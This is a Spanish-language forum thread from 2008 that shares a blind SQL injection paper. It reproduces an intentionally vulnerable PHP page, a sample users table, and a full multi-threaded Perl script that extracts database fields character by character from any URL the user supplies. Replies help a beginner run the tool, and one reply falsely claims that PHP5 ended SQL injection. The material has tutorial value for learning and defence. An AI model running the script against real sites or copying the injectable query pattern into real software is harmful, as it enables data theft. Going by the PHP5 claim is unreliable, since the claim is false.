Aqui dejo este papper que me paso ka0x para ser publicado aqui, esta bastante interesante
http://www.milw0rm.com/papers/197
Un Saludo
Editado:
Aqui dejo los codigos, para que no se tengan que copiar del PDF:
Codigo php:
<?php
# ---- CONFIG -----
$host = 'localhost';
$dbuser = 'root';
$dbpass = 'password';
$dbname = 'blind';
# -----------------
echo "<title>Blind SQL Injection Test - D.O.M LABS 2008</title>";
$db = mysql_connect($host, $dbuser, $dbpass);
mysql_select_db($dbname,$db);
$sql = "SELECT * FROM users WHERE id=".$_GET['id'];
$query = mysql_query($sql);
if(@mysql_num_rows($query)==0){
die('No hay columnas');
}
$result=@mysql_fetch_row($query);
echo "<h2><center><u>Blind SQL Injection Test<br>D.O.M LABS</u><br><br>";
echo "<font color='#FF0000'>user_id: </font>".$result[0]."<br>";
echo "<font color='#FF0000'>username: </font>".$result[1]."<br>";
// echo "Passwd: ".$result[2]."<br>";
echo "</h2></center>";
die();
?>
Código SQL:
-- Table: users
-- by ka0x - D.O.M
-- Blind SQL Injection Paper
CREATE TABLE `users` (
`id` int(10) unsigned NOT NULL auto_increment,
`name` varchar(50) NOT NULL,
`password` varchar(50) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ;
-- users --
INSERT INTO `users` VALUES (1, 'administrator', '1234%&_');
INSERT INTO `users` VALUES (2, 'ka0x', 't3st_bl1nd');
INSERT INTO `users` VALUES (3, 'bush', 'terrorist');
-- eof --
Código Perl:
#!/usr/bin/perl -W
# Blind MySQL Injection Paper
# example brute force
# -- OPTIONS --
my $MAX_FIELD_LENGTH = 200 ;
my $EXIT_IF_NO_CHAR = 1 ;
my $DEFAULT_THREADS = 15 ;
my $DEFAULT_THREADS_TIMEOUT = 30 ;
my @ascii = ( 33 .. 123 ) ;
my $DEFAULT_THREADS_TIME = 1 ;
# ---
use LWP::UserAgent ;
sub _HELP_AND_EXIT
{
die "
./$0 -u <url> -tn <table> -cn <column> -p <pattern>
Options:
-u <url> Ex: http://www.google.es/vuln.php?id=1
-tn <table_name> Table name.
-cn <column_name> Column name.
-p <pattern> HTML pattern.
Other:
-t <#> Threads, default '$DEFAULT_THREADS'.
-l <#> Maximum table name length '$MAX_FIELD_LENGTH'.
-T <#> Timeout.
-h Help (also with --help).
" ;
}
my ($p, $w) = ({ @ARGV }, { }) ;
map {
&_HELP_AND_EXIT if $_ eq '--help' or $_ eq '-h' ;
} keys %$p ;
map {
die "[!] Require: $_\n" unless $p->{ $_ } ;
} qw/-u -tn -cn -p/ ;
$p->{'-t'} = ( $p->{'-t'} and $p->{'-t'} =~ /^\d+$/ ) ? $p->{'-t'} : ( $w->{'-t'} = $DEFAULT_THREADS ) ;
$p->{'-l'} = ( $p->{'-l'} and $p->{'-l'} =~ /^\d+$/ ) ? $p->{'-l'} : ( $w->{'-l'} = $MAX_FIELD_LENGTH ) ;
$p->{'-T'} = ( $p->{'-T'} and $p->{'-T'} =~ /^\d+$/ ) ? $p->{'-T'} : ( $w->{'-T'} = $DEFAULT_THREADS_TIMEOUT ) ;
map {
warn "[i] Getting default: $_ $w->{ $_ }\n" ;
} sort keys %$w ;
( &_IS_VULN( $p ) ) ? &_START_WORK( $p ) : die "[i] Bad pattern ? Isn't vulnerable ?\n" ;
sub _START_WORK
{
my $p = shift ;
($p->{'id_value'}) = ( $p->{'-u'} =~ /(\d+)$/ ) ; # Get the id value
my $position = 1 ;
pipe(R, W) ;
pipe(Rs, Ws) ;
autoflush STDOUT 1 ;
my $sql_message = '' ;
my $msg = '' ;
my @pid ;
while( $position <= $p->{'-l'} )
{
my $cf ;
unless( $cf = fork ){ &_CHECKING( $p, $position ) ; exit(0) ; }
push(@pid, $cf) ;
my $count = 0 ;
my $can_exit ;
my $char_printed ;
while(<R>)
{
chomp ;
push(@pid, (split(/:/))[1] ) if /^pid/ ;
my ($res, $pos, $ascii) = ( split(/ /, $_) ) ;
$count++ if $pos == $position ;
print "\b" x length($msg), ($msg = "$position $ascii " . chr($ascii) ) ;
if( $res eq 'yes' and $pos == $position ){
$char_printed = $can_exit = 1 ;
print Ws "STOP $position\n" ;
$sql_message .= chr( $ascii ) ;
}
last if ( $can_exit or $count == @ascii );
}
map { waitpid($_, 0) } @pid ;
unless( $char_printed )
{
if( $EXIT_IF_NO_CHAR )
{
warn "\n[!] \$EXIT_IF_NO_CHAR : I can't find a valid character, position $position.\n" ;
last ;
}
}
$position++ ;
}
print "[i] SQL_FIELD:\n$sql_message\n" ;
}
sub _CHECKING
{
my ($p, $position) = @_ ;
my $counter = 0 ;
my $stop_position ;
foreach my $ascii ( @ascii )
{
$counter++ ;
if( $counter % $p->{'-t'} == 0 )
{
my $stop_position ;
eval
{
$SIG{'ALRM'} = sub { die "non_stop\n" } ;
alarm $DEFAULT_THREADS_TIME ;
my $line = <Rs> ;
$stop_position = (split( / /, $line))[1] ;
alarm 0 ;
} ;
if( ($stop_position) and $stop_position == $position ){ print "\nnext position\n" ; exit(0) ; }
}
unless(my $pid = fork )
{
print Ws "pid:$pid\n" or die ;
my $url = $p->{'-u'} .
' AND ascii(substring((SELECT ' . $p->{'-cn'} .
' FROM ' . $p->{'-tn'} . ' where id=' .
$p->{'id_value'} . '),' . $position . ',1))='. $ascii ;
my $ua = LWP::UserAgent->new ;
$ua->timeout( $p->{'-T'} ) ;
my $content ;
while( 1 )
{
last if $content = $ua->get( $url )->content ;
}
( $content =~ /$p->{'-p'}/ ) ? print W "yes $position $ascii\n" : print W "no $position $ascii\n" ;
exit( 0 ) ;
}
}
}
sub _IS_VULN
{
my $p = shift ;
my $ua = LWP::UserAgent->new ;
$ua->timeout( $p->{'-T'} ) ;
my ( $one, $two ) = (
$ua->get( $p->{'-u'}." AND 1=1")->content ,
$ua->get( $p->{'-u'}." AND 1=2")->content ,
) ;
return ($one =~ /$p->{'-p'}/ and $two !~ /$p->{'-p'}/) ? 1 : undef ;
}
Precisamente ayer lei el paper y .. Esta muy bueno :D
Saludos :)
w0w! :o
Lo leí y esta perfecto ademas metieron códigos de ejemplo :D
Asi si que se entiende 100%
Saludos.
Muy bonito :laugh:
Y fácil de entender , haber si postean más así ^^
Saludos.
Tengo un problema y es que cuando he subido la base de datos... y esta todo echo pero cuando lo cargo... es decir cuando abro el archivo php... me dice "No hay columnas".
La verdad, no se donde esta el fallo, he echo bien lo del config, he subido el SQL posteado a mi base de datos y nada, me da ese error...
Atte: GiR
Cita de: GiRLaZo en 27 Abril 2008, 22:06 PM
Saludos.
Tengo un problema y es que cuando he subido la base de datos... y esta todo echo pero cuando lo cargo... es decir cuando abro el archivo php... me dice "No hay columnas".
La verdad, no se donde esta el fallo, he echo bien lo del config, he subido el SQL posteado a mi base de datos y nada, me da ese error...
Atte: GiR
hombre lógico, si entras http://localhost/vulnerable.php no seleccionas ningun registro de la base de datos y el script muere diciendo que "No hay columnas":
if(@mysql_num_rows($query)==0){
die('No hay columnas');
}
pero si haces: http://localhost/vulnerable.php?id=1
Pues ya te saldra el usuario "administrator".
Saludos.
Saludos
Gracias, no me habia dado cuenta del enorme fallo pero ahora mi duda es que ejecuto el archivo perl... con cmd.exe
guardo el archivo como blind.pl voy a abrirlo con el CMD.exe y me abre un bloc de notas con el codigo =( ?? como hago para que se ejecute devidamente?
Atte:GiR
lee los post pegados uqe para algo estan, busca de como abrir exploits y eso, tienes que intstalar perl y con cmd invocar a este con el nombre de archivo que quieres que interprete ;)
sobre el tuto lo estoy leyendo, me estoy metiendo un poco en ese rollo, por cierto el amigo R41N-W4R3 me pasu un excelente manual, espero que lo pueda compartir con ustedes tambien :D
Saludos
Gracias por vuestra paciencia por un newbie tan grande como yo ^^ espero que algun futuro os pueda ayudar en lo que sea...
Atte: GiR
PD: perdonar mi ignorancia
Cita de: GiRLaZo en 28 Abril 2008, 20:26 PM
Saludos
Gracias, no me habia dado cuenta del enorme fallo pero ahora mi duda es que ejecuto el archivo perl... con cmd.exe
guardo el archivo como blind.pl voy a abrirlo con el CMD.exe y me abre un bloc de notas con el codigo =( ?? como hago para que se ejecute devidamente?
Atte:GiR
Yo el script lo probe en WINDOWS y no rula, al parecer esta hecho para LINUX.
Pruebalo en Linux, guardas el código como blind.pl, vas a la terminal, vas al directorio donde hayas dejado el script y lo ejecutas:
# perl blind.pl <argumentos del script>
ó
# ./blind.pl <argumentos del script>
Saludos.
Saludos.
z1rr0s1s ami en windows me ha funciona... es decir me ha ejecutado lo que pasa que el ultimo atributo -p... no se exactamente que es lo que quiere decir o que dato es vaya
Atte:GiR
El argumento -p es el patron de busqueda.
Osea cuando da un valor true (cuando se muestra la información de la página correctamente), suele mostrar:
user_id, username. Cualquier palabra que aparezca cuando el valor es true puede ser el argumento -p. En la imagen que ponen de la ejecución del script en el pdf ponen en el agumento si te fijas "user_id". Claro esta que con que podrias "id" ya te valdria ;)
Saludos.
Como va a andar en windows :laugh: !? bajencen el ActivePerl si lo quieren ejecutar en win, en la mayoria d los linux viene nativo sino.
Con respecto al tutorial es bueno y entendible, lo unico malo son los ERRORES de ortografia q tiene, los cuales le sacan toda la seriedad; para la proxima q se haga un script auto-corrector xDDD
Para el SQL-blind recomiendo el SQLninja es genial !
Cita de: Snap90210 en 30 Abril 2008, 04:43 AM
Para el SQL-blind recomiendo el SQLninja es genial !
¿De que te sirve usar una herramienta sin saber que operación realiza?
Saludos.
Cita de: z1rr0s1s en 30 Abril 2008, 21:20 PM
¿De que te sirve usar una herramienta sin saber que operación realiza?
Saludos.
Se nota que no tienes idea de lo que estas hablando, ni sabes lo que es una Blind-SQL, ni el porque del uso de scripts.
jajajaja en fin ...
sigue usando SQLNinja ;)! paso de discutir en el foro.
Saludos.
y si lee/estudia mucho primero y dsp volve ! (http://www.everythingyourspace.com/layouts/up/bace-85675-th_emoticons.jpg)
saludos
La verdad esta bien escrito, expresado y demas, pero es inutil en el sentido de que ahora con php5 se acabaron las inyecciones SQL, a noser que alguien sea tan estupido para poner safemode en off. Respecto a su autor merece un respeto, hablamos de ka0x, uno de los mejores defacers españoles.
Saludos, aLm!